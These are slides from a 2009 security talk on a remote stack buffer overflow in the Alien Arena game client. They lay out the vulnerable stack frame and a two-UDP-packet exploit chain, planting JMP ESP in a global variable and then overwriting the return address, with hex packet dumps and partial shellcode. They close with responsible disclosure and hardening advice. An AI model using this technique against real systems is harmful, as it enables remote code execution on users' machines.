Anonymous Remote Arbitrary Code
Execution in Alien Arena
Jason [email protected]
AHA_0x0025 • October 28th, 2009
About Me• 2007 – Present
Principal Security Consultant@ NGSSoftware
• 2004 – 2007Reverse Engineer@ Microsoft Corporation
BackgroundJune 21, 2009 – New open source
gameannounced on Slashdot
Approach• Download source code• Analyze how incoming packets are
parsed• Look for security vulnerabilities• Develop proof-of-concept exploit• Responsibly disclose vulnerability to
publisher
Parsing Incoming Packets
Parsing Incoming Packets
Parsing Incoming Packets
Parsing Incoming Packets
Parsing Incoming Packets
Stack FrameStack Frame
OffsetValue Byte
s-0x012A seps 2-0x0128 players 4-0x0124 result 4-0x0120 playername 32-0x0100 lastToken 256 0x0000 Return Address 4 0x0004 adr 20 0x0018 status_string 4
Exploitation• We can clearly overwrite the Return
Address
• What address should we use, though?
Exploitation• Ideally:
1. Address is constant across all versions of Windows
2. Address does not contain a null-byte (0x00345678 would be bad)
3. Code at this address is readable and executable
4. Attacker can write to this address
Exploitation• Address of a static/global variable in Alien
Arena’s executable:
1. Address is constant across all versions of Windows
Constant address since the executable is not linked for Address Space Layout Randomization (ASLR)
Exploitation• Address of a static/global variable in Alien
Arena’s executable:
2. Address does not contain a null-byte (0x00345678 would be bad)
The .data PE section ranges from[0x000BB000 – 0x05A833D9], so we should be able to find a variable whose address doesn’t contain a null-byte
Exploitation• Address of a static/global variable in Alien
Arena’s executable:
3. Code at this address is readable and executable
The .data PE section’s characteristics are linked as both Readable and Writeable, and since the executable isn’t linked for DEP, the section is executable too
Exploitation• Address of a static/global variable in Alien
Arena’s executable:
4. Attacker can write to this address
We need to find a static/global variable in Alien Arena that we can write to whose address doesn’t contain a null-byte
The servers Global Array
• The servers global array begins at static address 0x05BE8EE0
• servers[0].port is at static address 0x05BE8F00
• servers[1].port is at static address 0x05BE9734
Payload #1• We can write 2 bytes to static address 0x05BE9734
• The function with the overflow vulnerability is a __cdecl function, so after “returning” to the overwritten return address, ESP points right after the overwritten return address, which we also control
• Machine code for JMP ESP is 0xFF 0xE4– Exactly two bytes! How convenient!
UDP Packet #1Offset Hex Data ASCII
0x000000000x000000080x00000010
FF FF FF FF 73 65 72 7665 72 73 20 00 00 00 0000 00 00 00 00 00 FF E4
....servers ............
-1 to causeCL_ReadPackets()to call
CL_ConnectionlessPacket()
“servers” command to cause CL_ConnectionlessPacket()
to call CL_ParseGetServersResponse()
servers[0].port = 0x0000 servers[0] lP address= 0.0.0.0
servers[1] lP address= 0.0.0.0 servers[1].port = 0xE4FF
Payload #2• We now have a static address to return
to
• We need to overflow the lasttoken buffer, overwrite the return address, and follow it with our shellcode
• Shellcode can’t contain null-bytes, ‘\n’, or ‘\\’ characters since they’re used for string tokenization
Offset Hex Data ASCII0x000000000x00000008...
0x00000108...
0x000001F0
FF FF FF FF 70 72 69 6E74 0A 41 41 41 41 41 41...
41 41 34 97 BE 05 33 C9...
7A 1A 0A
....print.AAAAAAAA4...3.z..
UDP Packet #2
-1 to causeCL_ReadPackets()to call
CL_ConnectionlessPacket()
“print” command to cause CL_ConnectionlessPacket()
to call M_AddToServerList(…)
Overwritten Return Address: 0x05BE9734 256 (0x100) junk bytes
‘\n’ for GetLine(…) Shellcode
Demo
Conclusion• Anonymous remote attacker can execute
arbitrary code on clients’ systems by sending two UDP packets
• Other vulnerabilities likely still exist in codebase
• Developers:– GS, ASLR, DEP would have deterred exploitation– Don’t use SDL-banned API functions like strcpy(…)
Q & A